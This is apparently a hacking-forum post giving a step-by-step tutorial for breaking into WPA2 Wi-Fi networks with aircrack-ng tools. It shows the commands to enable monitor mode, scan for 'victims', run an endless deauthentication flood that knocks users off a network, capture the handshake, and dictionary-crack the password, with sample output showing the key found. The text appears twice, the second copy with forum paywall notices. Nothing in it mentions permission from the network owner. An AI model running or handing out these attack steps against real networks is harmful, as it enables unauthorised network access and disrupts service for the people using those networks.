ryukxiao
Minigame Pro
2
MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1
300 XP
this works only on WPA2 networks
using brute force
Requirements:
1. aireplay-ng
2. Kali Linux
3. Airodump-ng
4. Aircrack-ng
5. A word list
6. Handshake (we will get it in this tutorial)
7. A wireless card compatible with monitor mode
0. Fire up your kali linux
So first, we need to find our target, first step is to put our wireless card in monitor mode.
1. Putting Wireless card in monitor mode:
Open a console and type:
iwconfig
This command willl show you your wireless cards , it should look like this:
as you can see i have the wlan0 card, please look at the mode, in my case it is Managed, we need to change it in monitor mode using this command:
airmon-ng start wlan0
type iwconfig again and check if you wireless card is on monitor mode. if you have succesfully did this correctly, congrats, we are now ready to scan for victims
2. Scanning for victims
Using airodump-ng we will scan wireless networks, by running this command:
airodump-ng wlan0mon
I used wlan0mon instead of wlan0 because when we used airmon-ng to change the mode we also renamed it to wlan0mon, mon=monitor
After running the command you should see something like this:
wait until you see your network, then press CTRL+C
After you found your network, please copy the BSSID and channel and keep them.
3. Capturing HandShake
here is the fun party, we will capture the handshake.
We will use airodump-ng to get the handshake.
first, run the following command:
airodump-ng -c --bssid -w . wlan1mon
replace with the channel
and with bssid.
we are now listening for handshakes, we will capture it when a device connects to the network, if you are impatient, you can flood the wifi network (without being connected to it) to force devices to reconnect to wifi using this command in another window:
aireplay-ng -0 0 -a wlan0
if it doesnt work, try wlan0mon
so lets explain the command:
-0 > means that we are making a deauth attack
0 > means that we will send infinite packets to the wifi
-a > is the flag for wifi network
wlan0 > is our interface, use wlan0mon in case it doesnt work.
let the command run until you see this:
as you can see, in the bigger window, we have a WPA handshake notifications, that means you captured the handshake!
you can see your handshake in the folder you run the command, it is a .cap file
after you get the handshake, stop the aireplay-ng command using CTRL+C
4.Cracking the password
we will use aircrack-ng, the .cap file, and a word list.
put this command:
aircrack-ng -a2 -b -w
replace with bssid, with wordlist file, then with capture file name
if the password is in the word list, you will get something like this:
Aircrack-ng 1.2 beta3 [00:01:49] 111040 keys tested (1017.96 k/s) KEY FOUND! [ password123 ] Master Key : A1 90 16 62 6C B3 E2 DB BB D1 79 CB 75 D2 C7 89 59 4A C9 04 67 10 66 C5 97 83 7B C3 DA 6C 29 2E Transient Key : CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71 2F 1A 26 34 DD 9F 61 F7 68 85 CC BC 0F 88 88 73 6F CB 3F CC 06 0C 06 08 ED DF EC 3C D3 42 5D 78 8D EC 0C EA D2 BC 8A E2 D7 D3 A2 7F 9F 1A D3 21 EAPOL HMAC : 9F C6 51 57 D3 FA 99 11 9D 17 12 BA B6 DB 06 B4
Congrats! You cracked the password
using brute force
Requirements:
1. aireplay-ng
2. Kali Linux
3. Airodump-ng
4. Aircrack-ng
5. A word list
6. Handshake (we will get it in this tutorial)
7. A wireless card compatible with monitor mode
0. Fire up your kali linux
So first, we need to find our target, first step is to put our wireless card in monitor mode.
1. Putting Wireless card in monitor mode:
Open a console and type:
iwconfig
This command willl show you your wireless cards , it should look like this:
You must upgrade your account or reply in the thread to view hidden text.
as you can see i have the wlan0 card, please look at the mode, in my case it is Managed, we need to change it in monitor mode using this command:
airmon-ng start wlan0
type iwconfig again and check if you wireless card is on monitor mode. if you have succesfully did this correctly, congrats, we are now ready to scan for victims
2. Scanning for victims
Using airodump-ng we will scan wireless networks, by running this command:
airodump-ng wlan0mon
I used wlan0mon instead of wlan0 because when we used airmon-ng to change the mode we also renamed it to wlan0mon, mon=monitor
After running the command you should see something like this:
You must upgrade your account or reply in the thread to view hidden text.
wait until you see your network, then press CTRL+C
After you found your network, please copy the BSSID and channel and keep them.
3. Capturing HandShake
here is the fun party, we will capture the handshake.
We will use airodump-ng to get the handshake.
first, run the following command:
airodump-ng -c --bssid -w . wlan1mon
replace with the channel
and with bssid.
we are now listening for handshakes, we will capture it when a device connects to the network, if you are impatient, you can flood the wifi network (without being connected to it) to force devices to reconnect to wifi using this command in another window:
aireplay-ng -0 0 -a wlan0
if it doesnt work, try wlan0mon
so lets explain the command:
-0 > means that we are making a deauth attack
0 > means that we will send infinite packets to the wifi
-a > is the flag for wifi network
wlan0 > is our interface, use wlan0mon in case it doesnt work.
let the command run until you see this:
You must upgrade your account or reply in the thread to view hidden text.
as you can see, in the bigger window, we have a WPA handshake notifications, that means you captured the handshake!
you can see your handshake in the folder you run the command, it is a .cap file
after you get the handshake, stop the aireplay-ng command using CTRL+C
4.Cracking the password
we will use aircrack-ng, the .cap file, and a word list.
put this command:
aircrack-ng -a2 -b -w
replace with bssid, with wordlist file, then with capture file name
if the password is in the word list, you will get something like this:
Aircrack-ng 1.2 beta3 [00:01:49] 111040 keys tested (1017.96 k/s) KEY FOUND! [ password123 ] Master Key : A1 90 16 62 6C B3 E2 DB BB D1 79 CB 75 D2 C7 89 59 4A C9 04 67 10 66 C5 97 83 7B C3 DA 6C 29 2E Transient Key : CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71 2F 1A 26 34 DD 9F 61 F7 68 85 CC BC 0F 88 88 73 6F CB 3F CC 06 0C 06 08 ED DF EC 3C D3 42 5D 78 8D EC 0C EA D2 BC 8A E2 D7 D3 A2 7F 9F 1A D3 21 EAPOL HMAC : 9F C6 51 57 D3 FA 99 11 9D 17 12 BA B6 DB 06 B4
Congrats! You cracked the password